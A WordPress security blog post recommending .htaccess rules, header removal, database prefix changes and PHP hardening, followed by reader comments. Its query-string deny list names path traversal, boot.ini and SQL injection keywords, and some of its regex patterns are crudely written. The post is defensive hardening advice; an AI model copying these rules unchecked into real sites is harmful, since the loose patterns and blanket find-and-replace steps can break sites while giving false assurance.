• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer

Tips and Tricks HQ

  • Home
  • Blog
  • Projects
    • All Projects
    • Simple WP Shopping Cart
    • WP Express Checkout Plugin
    • WP Download Monitor
    • WP Security and Firewall Plugin
    • WP eStore Plugin
    • WP Affiliate Platform
    • WP eMember
    • WP Lightbox Ultimate
    • WP Photo Seller
  • Products
    • All Products
    • Checkout
  • Support
    • Support Portal
    • Customer Only Forum
    • WP eStore Documentation
    • WP Affiliate Software Documentation
    • WP eMember Documentation
  • Contact

Advanced WordPress Security Tips

You are here: Home / Web Development / Blog Setup / Advanced WordPress Security Tips

Last updated: March 26, 2013





This is a follow-up from the Essential WordPress Security Tips article.

In general WordPress is pretty secure as long as you apply common sense and follow standard security practices. The tips mentioned in this article are for added security (you don’t need to apply them all).

However, if you are in the mood for some advanced tweaking then the following security tips should come in handy 😉

NOTE and DISCLAIMER

Most of these techniques require you to understand what you are doing.



It is strongly recommended that you first test these techniques on a test or development site before applying them to your live site. Doing some of the tips suggested here can break your site if not performed correctly.

We take no responsibility for any mishaps as a result of your efforts in applying the techniques discussed in this article.

Also note that these techniques assume that your WordPress installation is running Apache and you have mod_alias and mod_rewrite installed.

1. Disable HTTP Trace Method

There is a security attack technique called Cross Site Tracing (XST) which can be used together with another attack mechanism called Cross Site Scripting (XSS) which exploits systems which have HTTP TRACE functionality. HTTP TRACE is a default functional feature on most webservers and is used for things like debugging. Hackers who use XST will usually steal cookie and other sensitive server information via header requests.

You can disable the trace functionality either via your Apache configuration file or by putting the following in your .htaccess file:

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

2. Remove header outputs from your WordPress installation

WordPress can often add quite a lot of output in your header pertaining to various services. The following code shows how you can remove a lot of this output.

Warning: This can break some functionality if you are not careful. Eg, if you’re using RSS feeds then you may want to comment that line out.

Add the following code to your theme’s functions.php file:

remove_action('wp_head', 'index_rel_link');
remove_action('wp_head', 'feed_links', 2);
remove_action('wp_head', 'feed_links_extra', 3);
remove_action('wp_head', 'rsd_link');
remove_action('wp_head', 'wlwmanifest_link');
remove_action('wp_head', 'parent_post_rel_link', 10, 0);
remove_action('wp_head', 'start_post_rel_link', 10, 0);
remove_action('wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0);
remove_action('wp_head', 'wp_generator');
remove_action('wp_head', 'wp_shortlink_wp_head', 10, 0);
remove_action('wp_head', 'noindex', 1);

3. Deny comment posting via proxy server

You can reduce spam and general proxy requests by attempting to prevent comments which are posted via a proxy server. Use the code below (compliments of perishablepress.com) in your .htaccess file:

RewriteCond %{REQUEST_METHOD} =POST
RewriteCond %{HTTP:VIA}%{HTTP:FORWARDED}%{HTTP:USERAGENT_VIA}%{HTTP:X_FORWARDED_FOR}%{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}%{HTTP:HTTP_PC_REMOTE_ADDR}%{HTTP:HTTP_CLIENT_IP} !^$
RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
RewriteRule .* - [F,NS,L]

4. Change your default WordPress DB prefix

You may already be aware that WP uses a default prefix value of “wp_” for the DB tables. This can in turn be used by malicious bots and hackers to guess your DB table names.

In general, changing your WP DB prefix value is much easier to do at installation time because you can set it in your wp-config.php file.

Conversely if you already have a live WP site and you wish to change your DB prefix, then the procedure is a little more complicated.

A basic guide for changing the DB prefix after an install for those who are curious is briefly outlined below:

1) Do a full DB backup and save the backup somewhere offboard. Using something like BackupBuddy can useful.
2) Do a complete dump of your WP DB using PHPMyAdmin into a text file and save 2 copies – one for editing and the other as an original just in case.
3) Using a good code editor, replace all instances of “wp_” with your own prefix.
4) From your WP admin panel, deactivate all plugins
5) Using PHPMyAdmin, drop your old DB and import your new one using the file you edited in step 3.
6) Edit your wp-config.php file with the new DB prefix value.
7) Re-activate your WP plugins
8) Perform another save on your permalink settings by going to Settings->Permalinks in order to refresh your permalink structure.

Caution:

Sometimes plugins add their own prefix after the wordpress prefix where both are identical.

example, you might have a table name from a certain plugin has a name like the following: wp_wp_abc_table_name.

Be sure when replacing the “wp_” instances in step 2 above that you only replace the first “wp_” prefix and not the one following it.
For instance if we take the example we just mentioned we would replace the first prefix with our new prefix which for this example might be called “trx_”.

The new name would look like:

trx_wp_abc_tablename

Note that there are also WP plugins out there which can achieve the above steps for those who are not prepared to get their hands dirty.

5. Deny Potentially Dangerous Query Strings

You can put the following code in your .htacces file to help prevent XSS attacks.

BEWARE: Functionality of some plugins or themes could break if you are not careful to exclude strings which are used by them.

# QUERY STRING EXPLOITS
<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} ../   [NC,OR]
RewriteCond %{QUERY_STRING} boot.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag= [NC,OR]
RewriteCond %{QUERY_STRING} ftp: [NC,OR]
RewriteCond %{QUERY_STRING} http: [NC,OR]
RewriteCond %{QUERY_STRING} https:   [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
RewriteCond %{QUERY_STRING} ^.*([|]|(|)|<|>|'|"|;|?|*).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%22|%27|%3C|%3E|%5C|%7B|%7C).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|config|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>

6. Apply PHP hardening to your system

You can install and enable Suhosin which is a PHP hardening system on your server. This can further increase the security of your system by protecting against various vulnerabilities.

Suhosin typically installs on most PHP installations and is sometimes included by webhosting companies by default. (Check with your hosting provider)

If you can read more about Suhosin here.

Make sure to read the Essential WordPress Security Tips article if you haven’t done so already.

Related Posts

  • Essential WordPress Security Tips – Is Your Blog Protected?
  • Cool WordPress .htaccess Tips to Boost Your WordPress Site’s Security
  • What Would You Do If Somehow You Lost all Your Blog’s Content?
  • WordPress Optimization Tips and Tricks for Better Performance and Speed

Blog Setup,  Site Optimization Tips advanced wordpress security tips,  Security,  Wordpress,  wordpress security,  WordPress security tips

Reader Interactions

Comments (7 responses)

  1. Tommy says:
    November 11, 2013 at 11:33 am

    In another article on this site that lists a bunch of WP plugins there is the All in one WP security plugin available for DL. This is a great plugin and can help people with less knowledge of advanced security matters.

  2. dhenycahyoe says:
    November 29, 2012 at 4:36 pm

    Tips on good security, and it is easy to understand.
    thanks

  3. spinn says:
    September 9, 2012 at 9:03 am

    Ya great security tips ..its very useful to me..

  4. Peter Fisher says:
    July 26, 2012 at 5:16 pm

    This is a very good list of security tips. I liked this sentence ‘Most of these techniques require you to understand what you are doing.’ hehe
    I would recommended – As always – testing these in a development environment before hacking up production code. Like you said some plugins may not work after these changes.

Leave a Reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Featured & Popular Articles

Video Answers to Top WordPress QuestionsWordPress Optimization Tips and Tricks for Better Performance and SpeedEssential WordPress Security Tips - Is Your Blog Protected?WordPress Simple PayPal Shopping Cart PluginTop 15 Search Engine Optimization (SEO) Techniques I Forget to DoList of the Best and Must Use WordPress PluginsHow do I Start a Blog and Make Money Online?Good Domain Name Picking Tips for Your Blog SetupFind Out Which WordPress Web Hosting Company Offers the Cheapest and Reliable Web Hosting Solution

Featured WordPress Plugins

wordpress estore plugin
wordpress membership plugin
WP Express Checkout Plugin
WordPress Lightbox Ultimate Plugin
WordPress photo seller plugin
wordpress affiliate plugin

Recent Posts

  • Accept Donations via PayPal from Your WordPress Site Easil [...]
  • Buy Now Button Graphics for eCommerce Websites [...]
  • Subscription Button Graphics for eCommerce Websites [...]
  • Adding PayPal Payment Buttons to Your WordPress Sidebar Ea [...]
  • PayPal QR Codes [...]

Comment & Socialize

  • @Rodrigo Souza, Thank you f ...
    - admin
  • The example for 'slm_add_ed ...
    - Rodrigo Souza
  • @Ron, All the valid transac ...
    - admin
  • Hello, when people have sel ...
    - Ron
  • We have hte following featu ...
    - admin

Check out our solutions

View our WordPress plugin collection and start using them on your site.

Our WordPress Solutions

Footer

Company

  • About
  • Privacy Policy
  • Terms and Conditions
  • Affiliate Login

Top WordPress Plugins

  • Simple Shopping Cart
  • PayPal Donations
  • WP Express Checkout
  • WP eStore
  • WP eMember

Blogging Tips

  • How to Start a Blog
  • Selecting a Good Domain
  • Cheap WP Hosting
  • WP Video Tutorials
  • Simple SEO Tips

Search


Keep In Touch

Copyright © 2023 | Tips and Tricks HQ